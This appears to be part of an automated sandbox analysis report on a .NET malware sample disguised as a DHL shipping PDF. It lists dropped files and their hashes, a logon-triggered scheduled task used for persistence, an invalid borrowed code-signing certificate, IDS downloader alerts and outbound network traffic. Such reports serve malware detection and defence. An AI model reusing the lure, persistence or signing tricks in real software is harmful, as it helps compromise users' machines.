SHA-256:	452876FE504FC0DBEDBD7F8467E94F6E80002DB4572D02C723ABC69F8DF0B367
SHA-512:	A96158FDFFA424A4AC01220EDC789F3236C03AAA6A7C1A3D8BE62074B4923957E6CFEEB6E8852F9064093E0A290B0E56E4B5504D18113A7983F48D5388CEC747
Malicious:	false
Preview:	@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_enmsleo5.f2b.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hquz2vx3.0yx.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kijy0n2n.bl3.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pihdjnbo.yfl.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sezybrh3.sfo.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vrzktwka.i2q.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xxkkhjir.wuv.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ywoby2s2.mtb.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmp2454.tmp

Download File

Process:	C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1605
Entropy (8bit):	5.126263540763067
Encrypted:	false
SSDEEP:	24:2di4+S2qhH1jy1m4UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtw5Lxvn:cgeHgYrFdOFzOzN33ODOiDdKrsuTwPv
MD5:	F3F138612C05AF3C506A3394266526D9
SHA1:	666EBB1760D77B86FCD49C77CB6AA3C26C5AA584
SHA-256:	2C18FF548E5D8802FE15B19CE8CB6FCC3EF462023A4BF97BE1D20423DDDEDCCC
SHA-512:	C4440B93D42E5DCB2E9A712D4A7F2FE3DB27B7577BB52463CEAA54BB2695A73639053F0BEB714AC95C3DDA3C09362F843BDBC792F9E612E1A23FC23FCEBA4538
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>.

C:\Users\user\AppData\Local\Temp\tmp3358.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1605
Entropy (8bit):	5.126263540763067
Encrypted:	false
SSDEEP:	24:2di4+S2qhH1jy1m4UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtw5Lxvn:cgeHgYrFdOFzOzN33ODOiDdKrsuTwPv
MD5:	F3F138612C05AF3C506A3394266526D9
SHA1:	666EBB1760D77B86FCD49C77CB6AA3C26C5AA584
SHA-256:	2C18FF548E5D8802FE15B19CE8CB6FCC3EF462023A4BF97BE1D20423DDDEDCCC
SHA-512:	C4440B93D42E5DCB2E9A712D4A7F2FE3DB27B7577BB52463CEAA54BB2695A73639053F0BEB714AC95C3DDA3C09362F843BDBC792F9E612E1A23FC23FCEBA4538
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>.

C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe

Download File

Process:	C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	592392
Entropy (8bit):	7.66800102197465
Encrypted:	false
SSDEEP:	12288:hRFuyJu5+t75+cPvdoOStBVKFZKC+RmQZrJrlIOjjIAkR:zvJF7soctBoynRmQ9Jr2Ojjc
MD5:	FD2765443B95B23C0AB9FA091A6182AA
SHA1:	AAD32E77EB7ECDD3E0909D1018A6FCA8C4E26FC5
SHA-256:	7FC21521B3E61D0555C0C1ADB947D9724C8CA61DC9CAEEF85A110EC46D3B2D5D
SHA-512:	1FAEB844381054A62DC68EC2A7E74D751157A2589069E7186CDF5E681D17FF59B25987B5B9CE47B1A21DCF6C6FE41C303B4915384BC5B5A7F1C56E0053D57827
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 34% Antivirus: Virustotal, Detection: 51%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....v...............0......&......Z.... ........@.. .......................@............`.....................................O........"...............6... ....................................................... ............... ..H............text...`.... ...................... ..`.rsrc....".......$..................@..@.reloc....... ......................@..B................<.......H...................`.......8<..........................................n..(......(....X..(....X.[..0............{.....+..B...}.....(.........0...........(....}......}.....(....... .(...(.......o .....r...p".. As!...o"...........(#...o$..... .... .... ....(#...o%.....(&...o'......0..h.............. 01..YE....X...s...<.......+....;....+... ;....8#.... ....0...@;....+.. ....;....8..... ....;....+.. ....;....8....s(...%.o)....%.o.....8....s(...%.o)....%.o*.....8....s(...%.o

C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.66800102197465
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.98% Win32 Executable (generic) a (10002005/4) 49.93% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	DHL Shipping Details Ref ID 446331798008765975594-pdf.exe
File size:	592'392 bytes
MD5:	fd2765443b95b23c0ab9fa091a6182aa
SHA1:	aad32e77eb7ecdd3e0909d1018a6fca8c4e26fc5
SHA256:	7fc21521b3e61d0555c0c1adb947d9724c8ca61dc9caeef85a110ec46d3b2d5d
SHA512:	1faeb844381054a62dc68ec2a7e74d751157a2589069e7186cdf5e681d17ff59b25987b5b9ce47b1a21dcf6c6fe41c303b4915384bc5b5a7f1c56e0053d57827
SSDEEP:	12288:hRFuyJu5+t75+cPvdoOStBVKFZKC+RmQZrJrlIOjjIAkR:zvJF7soctBoynRmQ9Jr2Ojjc
TLSH:	9EC4F1609658CB13DA6D5BB14671E33243758DABF512D3868EE96CEB3C93BB0640C1CB
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...*.v...............0......&......Z.... ........@.. .......................@............`................................

File Icon


Icon Hash:	112149998941710f

Static PE Info

General

Entrypoint:	0x48ca5a
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xC276B42A [Sun May 21 02:27:54 2073 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	13/11/2018 01:00:00 09/11/2021 00:59:59
Subject Chain	CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
Version:	3
Thumbprint MD5:	DABD77E44EF6B3BB91740FA46696B779
Thumbprint SHA-1:	5B9E273CF11941FD8C6BE3F038C4797BBE884268
Thumbprint SHA-256:	4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
Serial:	7C1118CBBADC95DA3752C46E47A27438

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8ca08	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x8e000	0x22fc	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x8d400	0x3608
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x92000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x8c9ec	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x8aa60	0x8ac00	8a81bbe4c6612bd37c86e6511c896f2b	False	0.8460004926801802	data	7.66966852362325	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x8e000	0x22fc	0x2400	94b9fa23ef16ea3c32754a3c7f0e0d34	False	0.8621961805555556	data	7.423325635502859	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x92000	0xc	0x200	12fb92642e6ada61ad359f46387a821b	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x8e100	0x1bc2	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9898677174218969
RT_GROUP_ICON	0x8fcd4	0x14	data	1.05
RT_VERSION	0x8fcf8	0x404	data	0.4280155642023346
RT_MANIFEST	0x9010c	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
Comments	Microsoft C Runtime Library _codecvt_ids
CompanyName	Microsoft Corporation
FileDescription	.Netframwork
FileVersion	1.1.0.0
InternalName	ELRB.exe
LegalCopyright	Copyright: Microsoft Corporation.
LegalTrademarks	All rights reserved.
OriginalFilename	ELRB.exe
ProductName	Microsoft Visual Studio
ProductVersion	1.1.0.0
Assembly Version	1.0.0.0

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-03-12T19:08:14.337531+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49684	132.226.247.73	80	TCP
2025-03-12T19:08:17.931322+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49686	132.226.247.73	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 12, 2025 19:08:13.353737116 CET	49684	80	192.168.2.7	132.226.247.73
Mar 12, 2025 19:08:13.358505964 CET	80	49684	132.226.247.73	192.168.2.7
Mar 12, 2025 19:08:13.358632088 CET	49684	80	192.168.2.7	132.226.247.73
Mar 12, 2025 19:08:13.359039068 CET	49684	80	192.168.2.7	132.226.247.73
Mar 12, 2025 19:08:13.364547968 CET	80	49684	132.226.247.73	192.168.2.7
Mar 12, 2025 19:08:14.044418097 CET	80	49684	132.226.247.73	192.168.2.7
Mar 12, 2025 19:08:14.083157063 CET	49684	80	192.168.2.7	132.226.247.73
Mar 12, 2025 19:08:14.087843895 CET	80	49684	132.226.247.73	192.168.2.7
Mar 12, 2025 19:08:14.291591883 CET	80	49684	132.226.247.73	192.168.2.7
Mar 12, 2025 19:08:14.305147886 CET	49685	443	192.168.2.7	104.21.48.1
Mar 12, 2025 19:08:14.305190086 CET	443	49685	104.21.48.1	192.168.2.7
Mar 12, 2025 19:08:14.305282116 CET	49685	443	192.168.2.7	104.21.48.1
Mar 12, 2025 19:08:14.315524101 CET	49685	443	192.168.2.7	104.21.48.1
Mar 12, 2025 19:08:14.315542936 CET	443	49685	104.21.48.1	192.168.2.7
Mar 12, 2025 19:08:14.337531090 CET	49684	80	192.168.2.7	132.226.247.73
Mar 12, 2025 19:08:16.786513090 CET	49686	80	192.168.2.7	132.226.247.73
Mar 12, 2025 19:08:16.965914965 CET	80	49686	132.226.247.73	192.168.2.7
Mar 12, 2025 19:08:16.966017008 CET	49686	80	192.168.2.7	132.226.247.73
Mar 12, 2025 19:08:16.966424942 CET	49686	80	192.168.2.7	132.226.247.73
Mar 12, 2025 19:08:16.971991062 CET	80	49686	132.226.247.73	192.168.2.7
Mar 12, 2025 19:08:16.972969055 CET	443	49685	104.21.48.1	192.168.2.7
Mar 12, 2025 19:08:16.973062038 CET	49685	443	192.168.2.7	104.21.48.1
Mar 12, 2025 19:08:16.981059074 CET	49685	443	192.168.2.7	104.21.48.1
Mar 12, 2025 19:08:16.981071949 CET	443	49685	104.21.48.1	192.168.2.7
Mar 12, 2025 19:08:16.981414080 CET	443	49685	104.21.48.1	192.168.2.7
Mar 12, 2025 19:08:17.056287050 CET	49685	443	192.168.2.7	104.21.48.1
Mar 12, 2025 19:08:17.102224112 CET	49685	443	192.168.2.7	104.21.48.1
Mar 12, 2025 19:08:17.148339033 CET	443	49685	104.21.48.1	192.168.2.7
Mar 12, 2025 19:08:17.498085976 CET	443	49685	104.21.48.1	192.168.2.7
Mar 12, 2025 19:08:17.498158932 CET	443	49685	104.21.48.1	192.168.2.7
Mar 12, 2025 19:08:17.498253107 CET	49685	443	192.168.2.7	104.21.48.1
Mar 12, 2025 19:08:17.512557983 CET	49685	443	192.168.2.7	104.21.48.1
Mar 12, 2025 19:08:17.643527985 CET	80	49686	132.226.247.73	192.168.2.7
Mar 12, 2025 19:08:17.670718908 CET	49686	80	192.168.2.7	132.226.247.73
Mar 12, 2025 19:08:17.675431013 CET	80	49686	132.226.247.73	192.168.2.7
Mar 12, 2025 19:08:17.877087116 CET	80	49686	132.226.247.73	192.168.2.7
Mar 12, 2025 19:08:17.879300117 CET	49687	443	192.168.2.7	104.21.48.1
Mar 12, 2025 19:08:17.879343987 CET	443	49687	104.21.48.1	192.168.2.7
Mar 12, 2025 19:08:17.879415989 CET	49687	443	192.168.2.7	104.21.48.1
Mar 12, 2025 19:08:17.883991957 CET	49687	443	192.168.2.7	104.21.48.1
Mar 12, 2025 19:08:17.884004116 CET	443	49687	104.21.48.1	192.168.2.7
Mar 12, 2025 19:08:17.931322098 CET	49686	80	192.168.2.7	132.226.247.73
Mar 12, 2025 19:08:19.671215057 CET	443	49687	104.21.48.1	192.168.2.7
Mar 12, 2025 19:08:19.671395063 CET	49687	443	192.168.2.7	104.21.48.1
Mar 12, 2025 19:08:19.680439949 CET	49687	443	192.168.2.7	104.21.48.1
Mar 12, 2025 19:08:19.680464029 CET	443	49687	104.21.48.1	192.168.2.7
Mar 12, 2025 19:08:19.680757999 CET	443	49687	104.21.48.1	192.168.2.7
Mar 12, 2025 19:08:19.728228092 CET	49687	443	192.168.2.7	104.21.48.1
Mar 12, 2025 19:08:19.728708982 CET	49687	443	192.168.2.7	104.21.48.1
Mar 12, 2025 19:08:19.776336908 CET	443	49687	104.21.48.1	192.168.2.7
Mar 12, 2025 19:08:20.195887089 CET	443	49687	104.21.48.1	192.168.2.7
Mar 12, 2025 19:08:20.195960999 CET	443	49687	104.21.48.1	192.168.2.7
Mar 12, 2025 19:08:20.196078062 CET	49687	443	192.168.2.7	104.21.48.1
Mar 12, 2025 19:08:20.202275038 CET	49687	443	192.168.2.7	104.21.48.1
Mar 12, 2025 19:09:19.292018890 CET	80	49684	132.226.247.73	192.168.2.7
Mar 12, 2025 19:09:19.292171955 CET	49684	80	192.168.2.7	132.226.247.73
Mar 12, 2025 19:09:22.877245903 CET	80	49686	132.226.247.73	192.168.2.7
Mar 12, 2025 19:09:22.877439976 CET	49686	80	192.168.2.7	132.226.247.73
Mar 12, 2025 19:09:54.307004929 CET	49684	80	192.168.2.7	132.226.247.73
Mar 12, 2025 19:09:54.311747074 CET	80	49684	132.226.247.73	192.168.2.7
Mar 12, 2025 19:09:57.885050058 CET	49686	80	192.168.2.7	132.226.247.73
Mar 12, 2025 19:09:57.889729023 CET	80	49686	132.226.247.73	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 12, 2025 19:08:13.330125093 CET	61022	53	192.168.2.7	1.1.1.1
Mar 12, 2025 19:08:13.337186098 CET	53	61022	1.1.1.1	192.168.2.7
Mar 12, 2025 19:08:14.296742916 CET	49231	53	192.168.2.7	1.1.1.1
Mar 12, 2025 19:08:14.304152012 CET	53	49231	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
